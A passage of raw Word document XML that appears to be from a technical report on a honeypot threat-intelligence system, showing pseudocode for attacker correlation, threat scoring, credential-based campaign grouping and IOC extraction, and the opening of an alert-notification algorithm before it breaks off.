              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">17: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">//   recon: ≥3 ports/5 min; web: ≥10×404</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9024" w:name="_Toc69024"/>
      <w:r>
        <w:t xml:space="preserve">Algorithm A7 – Attacker Correlation, Threat Score and Campaigns</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9024"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="935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50"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w14:paraId="1C44353D" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A7 correlate.run (intel/correlate.py)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="4728BCD6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Input:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> events, detections; GeoIP database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="5AB6A575" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Output:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> attackers rows with GeoIP and threat score; campaigns; IOCs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="55E31788" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1:  UPSERT attackers ← aggregate events per ip (sessions, auth, commands, downloads, protocols, devices)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">for each</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> attacker with geo_source = NULL </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  attacker.geo ← geo.lookup(ip)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// private/lab IP: demo city if GEO_DEMO_MODE else 'private'; public IP: offline .mmdb</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">for each</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> recently updated attacker a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5:      score ← max(severity weight of a's detections)        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// CRITICAL 40, HIGH 20, MEDIUM 10, LOW 3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6:      score ← score + 6 × |distinct attack types| + 8 × min(logins ok, 3) + 10 × min(downloads, 3)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7:      score ← clamp(score, 0, 100)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8:      level ← CRITICAL </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> score ≥ 70, HIGH </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> ≥ 40, MEDIUM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> ≥ 15, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">else</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> LOW</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">9:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">end for</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10: sets ← { ip : set of user:pass pairs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 7 days }  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">for</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> ips with ≥ 5 pairs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">11: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">for each</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> pair of ips (a, b) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">12:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> |sets[a] ∩ sets[b]| ÷ |sets[a] ∪ sets[b]| ≥ 0.6 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> union(a, b)   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// Jaccard</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">13: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">end for</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">14: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">for each</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> group with ≥ 2 members </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">15:     id ← "CMP-" + SHA1(shared pairs)[0..8];  UPSERT campaigns; set attackers.campaign_id</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">16: extract IOCs: download URLs → url + host (ipv4/domain); uploaded files → sha256;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">17:     attackers with HIGH/CRITICAL detections → ipv4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9025" w:name="_Toc69025"/>
      <w:r>
        <w:t xml:space="preserve">Algorithm A8 – Alert Notification with Threshold, De-duplication and Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9025"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="935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50"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w14:paraId="1C44353D" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A8 notifier.notify (alerts/notifier.py)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="4728BCD6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Input:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> new detections from A6; alerts.yaml (min_severity, per-type overrides, dedupe_window_minutes = 10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="5AB6A575" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
